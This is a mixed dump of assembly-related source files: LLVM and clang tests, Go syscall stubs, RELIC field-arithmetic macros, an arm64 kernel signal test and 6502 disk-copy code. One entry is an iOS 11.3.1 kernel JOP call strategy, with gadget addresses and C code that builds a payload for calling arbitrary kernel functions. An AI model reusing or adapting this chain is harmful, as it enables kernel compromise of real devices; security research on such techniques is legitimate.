text
stringlengths 2
100k
| meta
dict |
---|---|
// RUN: %clang -target i386-unknown-unknown -ccc-print-phases -emit-ast %s 2> %t
// RUN: echo 'END' >> %t
// RUN: FileCheck -check-prefix EMIT-AST-PHASES -input-file %t %s
// EMIT-AST-PHASES: 0: input,
// EMIT-AST-PHASES: , c
// EMIT-AST-PHASES: 1: preprocessor, {0}, cpp-output
// EMIT-AST-PHASES: 2: compiler, {1}, ast
// EMIT-AST-PHASES-NOT: 3:
// EMIT-AST-PHASES: END
// RUN: touch %t.ast
// RUN: %clang -target i386-unknown-unknown -ccc-print-phases -c %t.ast 2> %t
// RUN: echo 'END' >> %t
// RUN: FileCheck -check-prefix COMPILE-AST-PHASES -input-file %t %s
// COMPILE-AST-PHASES: 0: input,
// COMPILE-AST-PHASES: , ast
// COMPILE-AST-PHASES: 1: compiler, {0}, ir
// COMPILE-AST-PHASES: 2: backend, {1}, assembler
// COMPILE-AST-PHASES: 3: assembler, {2}, object
// COMPILE-AST-PHASES-NOT: 4:
// COMPILE-AST-PHASES: END
// FIXME: There is a problem with compiling AST's in that the input language is
// not available for use by other tools (for example, to automatically add
// -lstdc++). We may need -x [objective-]c++-ast and all that goodness. :(
| {
"language": "Assembly"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System call support for AMD64, NetBSD
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
TEXT ·Syscall(SB),NOSPLIT,$0-56
JMP syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-80
JMP syscall·Syscall6(SB)
TEXT ·Syscall9(SB),NOSPLIT,$0-104
JMP syscall·Syscall9(SB)
TEXT ·RawSyscall(SB),NOSPLIT,$0-56
JMP syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-80
JMP syscall·RawSyscall6(SB)
| {
"language": "Assembly"
} |
; RUN: llvm-as < %s > %t
; RUN: llvm-nm %t | FileCheck %s
; Test for isBitcodeFile, llvm-nm must read from a file for this test.
target datalayout = "e-p:32:32:32-i1:8:8-i8:8:8-i16:16:16-i32:32:32-i64:32:64-f32:32:32-f64:32:64-v64:64:64-v128:128:128-a0:0:64-f80:128:128"
target triple = "i686-apple-darwin9.2.2"
; CHECK: foo
define i32 @foo() {
ret i32 0
}
| {
"language": "Assembly"
} |
; RUN: llc < %s -march=xcore
%struct.st = type <{ i8, i32, i8, i32, i8, i32 }>
@x = external global %struct.st, align 4
define i32 @test_entry() nounwind {
entry:
%0 = load i32* getelementptr inbounds (%struct.st* @x, i32 0, i32 3), align 2
ret i32 %0
}
| {
"language": "Assembly"
} |
// SPDX-License-Identifier: GPL-2.0
/*
* Copyright (C) 2019 ARM Limited
*
* Try to mangle the ucontext from inside a signal handler, toggling
* the mode bit to escalate exception level: this attempt must be spotted
* by Kernel and the test case is expected to be termninated via SEGV.
*/
#include "test_signals_utils.h"
#include "testcases.h"
#include "mangle_pstate_invalid_mode_template.h"
DEFINE_TESTCASE_MANGLE_PSTATE_INVALID_MODE(3h);
| {
"language": "Assembly"
} |
/*
* RELIC is an Efficient LIbrary for Cryptography
* Copyright (C) 2007-2019 RELIC Authors
*
* This file is part of RELIC. RELIC is legal property of its developers,
* whose names are not listed here. Please refer to the COPYRIGHT file
* for contact information.
*
* RELIC is free software; you can redistribute it and/or modify it under the
* terms of the version 2.1 (or later) of the GNU Lesser General Public License
* as published by the Free Software Foundation; or version 2.0 of the Apache
* License as published by the Apache Software Foundation. See the LICENSE files
* for more details.
*
* RELIC is distributed in the hope that it will be useful, but WITHOUT ANY
* WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
* A PARTICULAR PURPOSE. See the LICENSE files for more details.
*
* You should have received a copy of the GNU Lesser General Public or the
* Apache License along with RELIC. If not, see <https://www.gnu.org/licenses/>
* or <https://www.apache.org/licenses/>.
*/
#include "relic_fp_low.h"
/**
* @file
*
* Implementation of low-level prime field multiplication.
*
* @version $Id: relic_fp_add_low.c 88 2009-09-06 21:27:19Z dfaranha $
* @ingroup fp
*/
#define P0 0xAAA00001800002AB
#define P1 0xA6C589556B2AA956
#define P2 0xB3DB9994ACE86D1B
#define P3 0x4BD93954FCB314B8
#define P4 0x3F665E3A5B1D5623
#define P5 0xA00E0F95B4920300
#define P6 0x555955557955572A
#define P7 0x0000000000000055
#define U0 0x4B3EF8137F4017FD
.text
.macro ADD1 i j
movq 8*\i(%rsi), %r10
adcq $0, %r10
movq %r10, 8*\i(%rdi)
.if \i - \j
ADD1 "(\i + 1)" \j
.endif
.endm
.macro ADDN i j
movq 8*\i(%rdx), %r11
adcq 8*\i(%rsi), %r11
movq %r11, 8*\i(%rdi)
.if \i - \j
ADDN "(\i + 1)" \j
.endif
.endm
.macro SUB1 i j
movq 8*\i(%rsi),%r10
sbbq $0, %r10
movq %r10,8*\i(%rdi)
.if \i - \j
SUB1 "(\i + 1)" \j
.endif
.endm
.macro SUBN i j
movq 8*\i(%rsi), %r8
sbbq 8*\i(%rdx), %r8
movq %r8, 8*\i(%rdi)
.if \i - \j
SUBN "(\i + 1)" \j
.endif
.endm
.macro DBLN i j
movq 8*\i(%rsi), %r8
adcq %r8, %r8
movq %r8, 8*\i(%rdi)
.if \i - \j
DBLN "(\i + 1)" \j
.endif
.endm
.macro MULN i, j, k, C, R0, R1, R2, A, B
.if \j > \k
movq 8*\i(\A), %rax
mulq 8*\j(\B)
addq %rax , \R0
adcq %rdx , \R1
adcq $0 , \R2
MULN "(\i + 1)", "(\j - 1)", \k, \C, \R0, \R1, \R2, \A, \B
.else
movq 8*\i(\A), %rax
mulq 8*\j(\B)
addq %rax , \R0
movq \R0 , 8*(\i+\j)(\C)
adcq %rdx , \R1
adcq $0 , \R2
.endif
.endm
.macro FP_MULN_LOW C, R0, R1, R2, A, B
movq 0(\A),%rax
mulq 0(\B)
movq %rax ,0(\C)
movq %rdx ,\R0
xorq \R1,\R1
xorq \R2,\R2
MULN 0, 1, 0, \C, \R0, \R1, \R2, \A, \B
xorq \R0,\R0
MULN 0, 2, 0, \C, \R1, \R2, \R0, \A, \B
xorq \R1,\R1
MULN 0, 3, 0, \C, \R2, \R0, \R1, \A, \B
xorq \R2,\R2
MULN 0, 4, 0, \C, \R0, \R1, \R2, \A, \B
xorq \R0,\R0
MULN 0, 5, 0, \C, \R1, \R2, \R0, \A, \B
xorq \R1,\R1
MULN 0, 6, 0, \C, \R2, \R0, \R1, \A, \B
xorq \R2,\R2
MULN 0, 7, 0, \C, \R0, \R1, \R2, \A, \B
xorq \R0,\R0
MULN 1, 7, 1, \C, \R1, \R2, \R0, \A, \B
xorq \R1,\R1
MULN 2, 7, 2, \C, \R2, \R0, \R1, \A, \B
xorq \R2,\R2
MULN 3, 7, 3, \C, \R0, \R1, \R2, \A, \B
xorq \R0,\R0
MULN 4, 7, 4, \C, \R1, \R2, \R0, \A, \B
xorq \R1,\R1
MULN 5, 7, 5, \C, \R2, \R0, \R1, \A, \B
xorq \R2,\R2
MULN 6, 7, 6, \C, \R0, \R1, \R2, \A, \B
movq 56(\A),%rax
mulq 56(\B)
addq %rax ,\R1
movq \R1 ,112(\C)
adcq %rdx ,\R2
movq \R2 ,120(\C)
.endm
.macro _RDCN0 i, j, k, R0, R1, R2 A, P
movq 8*\i(\A), %rax
mulq 8*\j(\P)
addq %rax, \R0
adcq %rdx, \R1
adcq $0, \R2
.if \j > 1
_RDCN0 "(\i + 1)", "(\j - 1)", \k, \R0, \R1, \R2, \A, \P
.else
addq 8*\k(\A), \R0
adcq $0, \R1
adcq $0, \R2
movq \R0, %rax
mulq %rcx
movq %rax, 8*\k(\A)
mulq 0(\P)
addq %rax , \R0
adcq %rdx , \R1
adcq $0 , \R2
xorq \R0, \R0
.endif
.endm
.macro RDCN0 i, j, R0, R1, R2, A, P
_RDCN0 \i, \j, \j, \R0, \R1, \R2, \A, \P
.endm
.macro _RDCN1 i, j, k, l, R0, R1, R2 A, P
movq 8*\i(\A), %rax
mulq 8*\j(\P)
addq %rax, \R0
adcq %rdx, \R1
adcq $0, \R2
.if \j > \l
_RDCN1 "(\i + 1)", "(\j - 1)", \k, \l, \R0, \R1, \R2, \A, \P
.else
addq 8*\k(\A), \R0
adcq $0, \R1
adcq $0, \R2
movq \R0, 8*\k(\A)
xorq \R0, \R0
.endif
.endm
.macro RDCN1 i, j, R0, R1, R2, A, P
_RDCN1 \i, \j, "(\i + \j)", \i, \R0, \R1, \R2, \A, \P
.endm
// r8, r9, r10, r11, r12, r13, r14, r15, rbp, rbx, rsp, //rsi, rdi, //rax, rcx, rdx
.macro FP_RDCN_LOW C, R0, R1, R2, A, P
xorq \R1, \R1
movq $U0, %rcx
movq 0(\A), \R0
movq \R0 , %rax
mulq %rcx
movq %rax , 0(\A)
mulq 0(\P)
addq %rax , \R0
adcq %rdx , \R1
xorq \R2 , \R2
xorq \R0 , \R0
RDCN0 0, 1, \R1, \R2, \R0, \A, \P
RDCN0 0, 2, \R2, \R0, \R1, \A, \P
RDCN0 0, 3, \R0, \R1, \R2, \A, \P
RDCN0 0, 4, \R1, \R2, \R0, \A, \P
RDCN0 0, 5, \R2, \R0, \R1, \A, \P
RDCN0 0, 6, \R0, \R1, \R2, \A, \P
RDCN0 0, 7, \R1, \R2, \R0, \A, \P
RDCN1 1, 7, \R2, \R0, \R1, \A, \P
RDCN1 2, 7, \R0, \R1, \R2, \A, \P
RDCN1 3, 7, \R1, \R2, \R0, \A, \P
RDCN1 4, 7, \R2, \R0, \R1, \A, \P
RDCN1 5, 7, \R0, \R1, \R2, \A, \P
RDCN1 6, 7, \R1, \R2, \R0, \A, \P
RDCN1 7, 7, \R2, \R0, \R1, \A, \P
addq 8*15(\A), \R0
movq \R0, 120(\A)
movq 64(\A), %r11
movq 72(\A), %r12
movq 80(\A), %r13
movq 88(\A), %r14
movq 96(\A), %r15
movq 104(\A), %rcx
movq 112(\A), %rbp
movq 120(\A), %rdx
subq p0(%rip), %r11
sbbq p1(%rip), %r12
sbbq p2(%rip), %r13
sbbq p3(%rip), %r14
sbbq p4(%rip), %r15
sbbq p5(%rip), %rcx
sbbq p6(%rip), %rbp
sbbq p7(%rip), %rdx
cmovc 64(\A), %r11
cmovc 72(\A), %r12
cmovc 80(\A), %r13
cmovc 88(\A), %r14
cmovc 96(\A), %r15
cmovc 104(\A), %rcx
cmovc 112(\A), %rbp
cmovc 120(\A), %rdx
movq %r11,0(\C)
movq %r12,8(\C)
movq %r13,16(\C)
movq %r14,24(\C)
movq %r15,32(\C)
movq %rcx,40(\C)
movq %rbp,48(\C)
movq %rdx,56(\C)
.endm
| {
"language": "Assembly"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
//
// System calls for amd64, Windows are implemented in runtime/syscall_windows.goc
//
TEXT ·getprocaddress(SB), 7, $0-32
JMP syscall·getprocaddress(SB)
TEXT ·loadlibrary(SB), 7, $0-24
JMP syscall·loadlibrary(SB)
| {
"language": "Assembly"
} |
; RUN: echo create %t.a > %t.mri
; RUN: echo create %t.a >> %t.mri
; RUN: echo save >> %t.mri
; RUN: echo end >> %t.mri
; RUN: not llvm-ar -M < %t.mri 2>&1 | FileCheck %s
; CHECK: Editing multiple archives not supported
| {
"language": "Assembly"
} |
// -*- C++ -*-
//===----------------------------------------------------------------------===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
int main(int, char**)
{
return 0;
}
| {
"language": "Assembly"
} |
/*
* Arm64 Kernel Function Call Strategy 6
* -------------------------------------
*
* This is a variant of call strategy 5 that supports the iOS 11.3.1 kernelcache for the iPhone 8.
* Unfortunately due to a change in GADGET_POPULATE_2, this variant only supports up to 9
* arguments rather than 14.
*
* -----------------------------------------------------------------------------------------------
*
* kernel_call_2
* REGION_0 = {
* 0: REGION_1
* 8: FUNCTION
* 10: ARGUMENT_0
* 18
* 20: REGION_ARGUMENTS_2_TO_8
* 28: ARGUMENT_1
* 30: GADGET_POPULATE_3
* 38
* 40
* 48: GADGET_CALL_FUNCTION_1
* c0: JOP_STACK_2
* 268: REGION_2
* 288: <-RESULT
* }
* REGION_1 = {
* a0: JOP_DISPATCH
* d0: GADGET_STORE_RESULT_2
* 390: JOP_DISPATCH
* }
* REGION_ARGUMENTS_2_TO_8 = {
* 0: ARGUMENT_2
* 8: ARGUMENT_3
* 10: ARGUMENT_4
* 18: ARGUMENT_5
* 20: ARGUMENT_6
* 28: ARGUMENT_7
* 30: ARGUMENT_8
* }
* REGION_2 = {
* 0: REGION_3
* }
* REGION_3 = {
* 158: GADGET_EPILOGUE_2
* }
* JOP_STACK_1 = [
* MOV_X23_X19__BR_X8
* GADGET_INITIALIZE_X20_1
* MOV_X25_X19__BR_X8
* GADGET_POPULATE_3
* ]
* JOP_STACK_2 = [
* MOV_X19_X4__BR_X8
* MOV_X20_X7__BR_X8
* MOV_X23_X6__BLR_X8
* MOV_X0_X3__BLR_X8
* MOV_X24_X0__BLR_X8
* MOV_X8_X10__BR_X9
* ]
* x0 = REGION_0
* x1 = JOP_STACK_1
* pc = GADGET_PROLOGUE_2
*
* GADGET_PROLOGUE_2 (0xfffffff0063f51ac):
* ;; Save registers x19-x28, save the frame (x29, x30), and make
* ;; room for 0x40 bytes of local variables. sp must be
* ;; preserved until the epilogue.
* sub sp, sp, #0xa0
* stp x28, x27, [sp, #0x40]
* stp x26, x25, [sp, #0x50]
* stp x24, x23, [sp, #0x60]
* stp x22, x21, [sp, #0x70]
* stp x20, x19, [sp, #0x80]
* stp x29, x30, [sp, #0x90]
* add x29, sp, #0x90
* mov x19, x0
* ldr x8, [x19]
* ldr x8, [x8, #0x390]
* blr x8
* SAVE_REGISTERS(x19, ..., x28)
* x29 = STACK_FRAME()
* RESERVE_STACK(0x40)
* x19 = REGION_0
* x8 = REGION_0[0] = REGION_1
* x8 = REGION_1[0x390] = JOP_DISPATCH
* pc = JOP_DISPATCH
*
* ;; Just after the prologue we have the following register values:
* ;; x0 = REGION_0
* ;; x1 = JOP_STACK_1
* ;; x8 = JOP_DISPATCH
* ;; x19 = REGION_0
* ;; x29 = FRAME
* ;; We will populate registers using GADGET_POPULATE_3. Since we're using this
* ;; gadget with JOP_DISPATCH, we first need to initialize x20 to JOP_STACK_2 and
* ;; x23 to REGION_0.
*
* JOP_DISPATCH (0xfffffff0068fa24c):
* ldp x2, x1, [x1]
* br x2
* x2 = MOV_X23_X19__BR_X8
* pc = MOV_X23_X19__BR_X8
*
* MOV_X23_X19__BR_X8 (0xfffffff0066eb340)
* mov x23, x19
* br x8
* x23 = REGION_0
* pc = JOP_DISPATCH
*
* GADGET_INITIALIZE_X20_1 (0xfffffff0061d3d34):
* ;; This is a hack to get x20 to point to JOP_STACK_2 before
* ;; using GADGET_POPULATE_3.
* ldr x20, [x19, #0xc0]
* ldr x8, [x0]
* ldr x8, [x8, #0xa0]
* blr x8
* x20 = REGION_0[0xc0] = JOP_STACK_2
* x8 = REGION_0[0] = REGION_1
* x8 = REGION_1[0xa0] = JOP_DISPATCH
* pc = JOP_DISPATCH
*
* ;; We're about to execute GADGET_POPULATE_3. We want to fill the following
* ;; registers:
* ;; x19 = ARGUMENT_0
* ;; x20 = ARGUMENT_1
* ;; x23 = REGION_ARGUMENTS_2_TO_8
* ;; x24 = FUNCTION
* ;; x25 = REGION_0 (which serves as CALL_RESUME)
* ;; Last of all we want to set:
* ;; x8 = GADGET_CALL_FUNCTION_1
* ;; pc = GADGET_POPULATE_3
* ;; GADGET_POPULATE_3 will give us control of the following registers:
* ;; x3, x4, x5, x6, x7, x9, x10
* ;; Since we already have REGION_0 in x19, we'll set x25 now.
*
* MOV_X25_X19__BR_X8 (0xfffffff00668301c):
* mov x25, x19
* br x8
* x25 = REGION_0
* pc = JOP_DISPATCH
*
* GADGET_POPULATE_3 (0xfffffff006bfc320):
* ldp x2, x3, [x23]
* ldp x4, x5, [x23, #0x10]
* ldp x6, x7, [x23, #0x20]
* ldr x9, [x23, #0x30]
* ldur q0, [x23, #0x38]
* ldr x10, [x23, #0x48]
* stp x21, x22, [sp, #0x20]
* str x10, [sp, #0x18]
* stur q0, [sp, #8]
* str x9, [sp]
* mov x0, x19
* mov x1, x20
* blr x8
* x2 = REGION_0[0]
* x3 = REGION_0[0x8] = FUNCTION
* x4 = REGION_0[0x10] = ARGUMENT_0
* x5 = REGION_0[0x18]
* x6 = REGION_0[0x20] = REGION_ARGUMENTS_2_TO_8
* x7 = REGION_0[0x28] = ARGUMENT_1
* x9 = REGION_0[0x30] = GADGET_POPULATE_3
* x10 = REGION_0[0x48] = GADGET_CALL_FUNCTION_1
* x0 = REGION_0
* x1 = JOP_STACK_2
* pc = JOP_DISPATCH
*
* ;; Now that we've populated the registers, we just need to move the values to
* ;; where they belong. We need to set:
* ;; x19 = ARGUMENT_0
* ;; x20 = ARGUMENT_1
* ;; x23 = REGION_ARGUMENTS_2_TO_8
* ;; x24 = FUNCTION
* ;; x8 = GADGET_CALL_FUNCTION_1
* ;; pc = GADGET_POPULATE_3
*
* MOV_X19_X4__BR_X8 (0xfffffff006648eb4):
* mov x19, x4
* br x8
* x19 = ARGUMENT_0
* pc = JOP_DISPATCH
*
* MOV_X20_X7__BR_X8 (0xfffffff0065d1454):
* mov x20, x7
* br x8
* x20 = ARGUMENT_1
* pc = JOP_DISPATCH
*
* MOV_X23_X6__BLR_X8 (0xfffffff0065b3dc4):
* mov x23, x6
* blr x8
* x23 = REGION_ARGUMENTS_2_TO_8
* pc = JOP_DISPATCH
*
* MOV_X0_X3__BLR_X8 (0xfffffff0072a34a4):
* mov x0, x3
* blr x8
* x0 = FUNCTION
* pc = JOP_DISPATCH
*
* MOV_X24_X0__BLR_X8 (0xfffffff0075e5574):
* mov x24, x0
* blr x8
* x24 = FUNCTION
* pc = JOP_DISPATCH
*
* MOV_X8_X10__BR_X9 (0xfffffff006625318):
* mov x8, x10
* br x9
* x8 = GADGET_CALL_FUNCTION_1
* pc = GADGET_POPULATE_3
*
* ;; At this point, we have set the following registers:
* ;; x8 = GADGET_CALL_FUNCTION_1
* ;; x19 = ARGUMENT_0
* ;; x20 = ARGUMENT_1
* ;; x23 = REGION_ARGUMENTS_2_TO_8
* ;; x24 = FUNCTION
* ;; x25 = REGION_0
* ;; pc = GADGET_POPULATE_3
*
* GADGET_POPULATE_3 (0xfffffff006bfc320):
* ldp x2, x3, [x23]
* ldp x4, x5, [x23, #0x10]
* ldp x6, x7, [x23, #0x20]
* ldr x9, [x23, #0x30]
* ldur q0, [x23, #0x38]
* ldr x10, [x23, #0x48]
* stp x21, x22, [sp, #0x20]
* str x10, [sp, #0x18]
* stur q0, [sp, #8]
* str x9, [sp]
* mov x0, x19
* mov x1, x20
* blr x8
* x2 = REGION_ARGUMENTS_2_TO_8[0] = ARGUMENT_2
* x3 = REGION_ARGUMENTS_2_TO_8[0x8] = ARGUMENT_3
* x4 = REGION_ARGUMENTS_2_TO_8[0x10] = ARGUMENT_4
* x5 = REGION_ARGUMENTS_2_TO_8[0x18] = ARGUMENT_5
* x6 = REGION_ARGUMENTS_2_TO_8[0x20] = ARGUMENT_6
* x7 = REGION_ARGUMENTS_2_TO_8[0x28] = ARGUMENT_7
* x9 = REGION_ARGUMENTS_2_TO_8[0x30] = ARGUMENT_8
* x10 = REGION_ARGUMENTS_2_TO_8[0x48]
* STACK = [
* ARGUMENT_8,
* ]
* x0 = ARGUMENT_0
* x1 = ARGUMENT_1
* pc = GADGET_CALL_FUNCTION_1
*
* ;; Now all the arguments are set up correctly and we will execute
* ;; GADGET_CALL_FUNCTION_1. The following gadget allows us to resume execution
* ;; after the function call without messing with x30.
*
* GADGET_CALL_FUNCTION_1 (0xfffffff007592540):
* blr x24
* mov x19, x0
* ldr x8, [x25]
* ldr x8, [x8, #0xd0]
* mov x0, x25
* blr x8
* pc = FUNCTION
* x0 = RETURN_VALUE
* x19 = RETURN_VALUE
* x8 = REGION_0[0] = REGION_1
* x8 = REGION_1[0xd0] = GADGET_STORE_RESULT_2
* x0 = REGION_0
* pc = GADGET_STORE_RESULT_2
*
* GADGET_STORE_RESULT_2 (0xfffffff006459eb8):
* str x19, [x0, #0x288]
* ldr x0, [x0, #0x268]
* ldr x8, [x0]
* ldr x8, [x8, #0x158]
* blr x8
* REGION_0[0x288] = RETURN_VALUE
* x0 = REGION_0[0x268] = REGION_2
* x8 = REGION_2[0] = REGION_3
* x8 = REGION_3[0x158] = GADGET_EPILOGUE_2
* pc = GADGET_EPILOGUE_2
*
* GADGET_EPILOGUE_2 (0xfffffff0070f0bac):
* ;; Reset stack to entry conditions and return to caller. sp
* ;; must have been preserved from the prologue.
* ldp x29, x30, [sp, #0x90]
* ldp x20, x19, [sp, #0x80]
* ldp x22, x21, [sp, #0x70]
* ldp x24, x23, [sp, #0x60]
* ldp x26, x25, [sp, #0x50]
* ldp x28, x27, [sp, #0x40]
* add sp, sp, #0xa0
* ret
* RESTORE_REGISTERS(x19, ..., x28)
* pc = CALLER
*
* -----------------------------------------------------------------------------------------------
*
* 0 1 2 3 4 5 6 7 8 9 a b c d e f
* +----------------------------------------------------------------+
* 0 |BB BBAAAAAA AAAAAA AACCCCCCCCCCCCCC DDEE AA|
* 100 |JJJJJJJJJJJJJJJJKKKKKKKKKKKKKKKKKKKKKKKK |
* 200 | AA ** BB |
* +----------------------------------------------------------------+
* 0 1 2 3 4 5 6 7 8 9 a b c d e f
*
* A = REGION_0 = 0 - 270 @ 38
* * = RESULT = 0 - 8 @ 288 + REGION_0
* B = REGION_1 = a0 - 398 @ -a0
* C = REGION_ARGUMENTS_2_TO_8 = 0 - 38 @ 88
* D = REGION_2 = 0 - 8 @ d8
* E = REGION_3 = 158 - 160 @ -78
*
* J = JOP_STACK_1 = 0 - 40 @ 100
* K = JOP_STACK_2 = 0 - 60 @ 140
*
*/
#include "arm64/jop/call_strategy.h"
#include "arm64/jop/gadgets_static.h"
#include <assert.h>
#include <unistd.h> // for ssize_t
static bool
check() {
#define NEED(gadget) \
if (static_gadgets[gadget].address == 0) { \
return false; \
}
NEED(GADGET_PROLOGUE_2);
NEED(LDP_X2_X1_X1__BR_X2); // JOP_DISPATCH
NEED(MOV_X23_X19__BR_X8);
NEED(GADGET_INITIALIZE_X20_1);
NEED(MOV_X25_X19__BR_X8);
NEED(GADGET_POPULATE_3);
NEED(MOV_X19_X4__BR_X8);
NEED(MOV_X20_X7__BR_X8);
NEED(MOV_X23_X6__BLR_X8);
NEED(MOV_X0_X3__BLR_X8);
NEED(MOV_X24_X0__BLR_X8);
NEED(MOV_X8_X10__BR_X9);
NEED(GADGET_CALL_FUNCTION_1);
NEED(GADGET_STORE_RESULT_2);
NEED(GADGET_EPILOGUE_2);
return true;
#undef NEED
}
// Get the gadget by index, ensuring that it exists.
static inline uint64_t
gadget(unsigned gadget_index) {
uint64_t address = static_gadgets[gadget_index].address;
assert(address != 0);
return address;
}
static void
build(uint64_t func, const uint64_t args[14], kaddr_t kernel_payload,
void *payload0, struct jop_call_initial_state *initial_state,
uint64_t *result_address) {
uint8_t *payload = payload0;
// Define the offsets from the start of the payload to each of the structures.
const ssize_t REGION_0_OFFSET = 0x38;
const ssize_t RESULT_OFFSET = 0x288 + REGION_0_OFFSET;
const ssize_t REGION_1_OFFSET = - 0xa0;
const ssize_t REGION_ARGUMENTS_2_TO_8_OFFSET = 0x88;
const ssize_t REGION_2_OFFSET = 0xd8;
const ssize_t REGION_3_OFFSET = - 0x78;
const ssize_t JOP_STACK_1_OFFSET = 0x100;
const ssize_t JOP_STACK_2_OFFSET = 0x140;
// Get the addresses of each region in the local buffer.
uint8_t *payload_REGION_0 = payload + REGION_0_OFFSET;
uint8_t *payload_REGION_1 = payload + REGION_1_OFFSET;
uint8_t *payload_REGION_ARGUMENTS_2_TO_8 = payload + REGION_ARGUMENTS_2_TO_8_OFFSET;
uint8_t *payload_REGION_2 = payload + REGION_2_OFFSET;
uint8_t *payload_REGION_3 = payload + REGION_3_OFFSET;
uint8_t *payload_JOP_STACK_1 = payload + JOP_STACK_1_OFFSET;
// Get the addresses of each region in the kernel.
uint64_t kernel_REGION_0 = kernel_payload + REGION_0_OFFSET;
uint64_t kernel_RESULT = kernel_payload + RESULT_OFFSET;
uint64_t kernel_REGION_1 = kernel_payload + REGION_1_OFFSET;
uint64_t kernel_REGION_ARGUMENTS_2_TO_8 = kernel_payload + REGION_ARGUMENTS_2_TO_8_OFFSET;
uint64_t kernel_REGION_2 = kernel_payload + REGION_2_OFFSET;
uint64_t kernel_REGION_3 = kernel_payload + REGION_3_OFFSET;
uint64_t kernel_JOP_STACK_1 = kernel_payload + JOP_STACK_1_OFFSET;
uint64_t kernel_JOP_STACK_2 = kernel_payload + JOP_STACK_2_OFFSET;
// Construct the REGION_0 region.
*(uint64_t *)(payload_REGION_0 + 0x0) = kernel_REGION_1;
*(uint64_t *)(payload_REGION_0 + 0x8) = func;
*(uint64_t *)(payload_REGION_0 + 0x10) = args[0];
*(uint64_t *)(payload_REGION_0 + 0x20) = kernel_REGION_ARGUMENTS_2_TO_8;
*(uint64_t *)(payload_REGION_0 + 0x28) = args[1];
*(uint64_t *)(payload_REGION_0 + 0x30) = gadget(GADGET_POPULATE_3);
*(uint64_t *)(payload_REGION_0 + 0x48) = gadget(GADGET_CALL_FUNCTION_1);
*(uint64_t *)(payload_REGION_0 + 0xc0) = kernel_JOP_STACK_2;
*(uint64_t *)(payload_REGION_0 + 0x268) = kernel_REGION_2;
// Construct the REGION_1 region.
*(uint64_t *)(payload_REGION_1 + 0xa0) = gadget(LDP_X2_X1_X1__BR_X2);
*(uint64_t *)(payload_REGION_1 + 0xd0) = gadget(GADGET_STORE_RESULT_2);
*(uint64_t *)(payload_REGION_1 + 0x390) = gadget(LDP_X2_X1_X1__BR_X2);
// Construct the REGION_ARGUMENTS_2_TO_8 region.
*(uint64_t *)(payload_REGION_ARGUMENTS_2_TO_8 + 0x0) = args[2];
*(uint64_t *)(payload_REGION_ARGUMENTS_2_TO_8 + 0x8) = args[3];
*(uint64_t *)(payload_REGION_ARGUMENTS_2_TO_8 + 0x10) = args[4];
*(uint64_t *)(payload_REGION_ARGUMENTS_2_TO_8 + 0x18) = args[5];
*(uint64_t *)(payload_REGION_ARGUMENTS_2_TO_8 + 0x20) = args[6];
*(uint64_t *)(payload_REGION_ARGUMENTS_2_TO_8 + 0x28) = args[7];
*(uint64_t *)(payload_REGION_ARGUMENTS_2_TO_8 + 0x30) = args[8];
// Construct the REGION_2 region.
*(uint64_t *)(payload_REGION_2 + 0x0) = kernel_REGION_3;
// Construct the REGION_3 region.
*(uint64_t *)(payload_REGION_3 + 0x158) = gadget(GADGET_EPILOGUE_2);
// Construct the JOP stacks. We can merge them together during construction, since the link
// from JOP_STACK_1 to JOP_STACK_2 will be ignored during execution anyway.
unsigned jop_chain[] = {
// JOP_STACK_1
MOV_X23_X19__BR_X8,
GADGET_INITIALIZE_X20_1,
MOV_X25_X19__BR_X8,
GADGET_POPULATE_3,
// JOP_STACK_2
MOV_X19_X4__BR_X8,
MOV_X20_X7__BR_X8,
MOV_X23_X6__BLR_X8,
MOV_X0_X3__BLR_X8,
MOV_X24_X0__BLR_X8,
MOV_X8_X10__BR_X9,
};
struct JOP_DISPATCH_NODE {
uint64_t x2;
uint64_t x1;
} *payload_JOP_DISPATCH_NODE = (void *) payload_JOP_STACK_1;
uint64_t kernel_next_JOP_DISPATCH_NODE = kernel_JOP_STACK_1;
for (size_t i = 0; i < ARRSIZE(jop_chain); i++) {
kernel_next_JOP_DISPATCH_NODE += sizeof(*payload_JOP_DISPATCH_NODE);
payload_JOP_DISPATCH_NODE->x2 = gadget(jop_chain[i]);
payload_JOP_DISPATCH_NODE->x1 = kernel_next_JOP_DISPATCH_NODE;
payload_JOP_DISPATCH_NODE++;
}
// Set the initial arguments.
initial_state->pc = gadget(GADGET_PROLOGUE_2);
initial_state->x[0] = kernel_REGION_0;
initial_state->x[1] = kernel_JOP_STACK_1;
// Set the address at which the result will be stored.
*result_address = kernel_RESULT;
}
/*
* jop_call_strategy_6
*
* Description:
* The JOP payload described at the top of this file.
*
* Capabilities:
* Supports 8 arguments passed in registers and 8 bytes of stack arguments.
*
* Platforms:
* iOS 11.3.1 15E302: iPhone10,1
* iOS 11.3.1 15E302: iPhone6,2
*/
struct jop_call_strategy jop_call_strategy_6 = {
0x300, 0x8, check, build,
};
| {
"language": "Assembly"
} |
// RUN: not %clang_cc1 -fsyntax-only %s
// PR1900
// This test should get a redefinition error from m_iopt.h: the MI opt
// shouldn't apply.
#define MACRO
#include "mi_opt.h"
#undef MACRO
#define MACRO || 1
#include "mi_opt.h"
| {
"language": "Assembly"
} |
.page 'disk copy'
;
; dskcpy check for type
; and parses special case
;
dskcpy
lda #$e0 ; kill bam buffer
sta bufuse
jsr clnbam ; clr tbam
jsr bam2x ; get bam lindx in .x
lda #$ff
sta buf0,x ; mark bam out-of-memory
lda #$0f
sta linuse ; free all lindxs
jsr prscln ; find ":"
bne dx0000
jmp duplct ; bad command error, cx=x not allowed
;
;jsr prseq
;
;lda #'* ;cpy all
;ldx #39 ;put at buffer end
;stx filtbl+1
;sta cmdbuf,x ;place *
;inx
;stx cmdsiz
;ldx #1 ;set up cnt's
;stx f1cnt
;inx
;stx f2cnt
;jmp movlp2 ;enter routine
;
dx0000 jsr tc30 ; normal parse
dx0005 jsr alldrs ; put drv's in filtbl
lda image ; get parse image
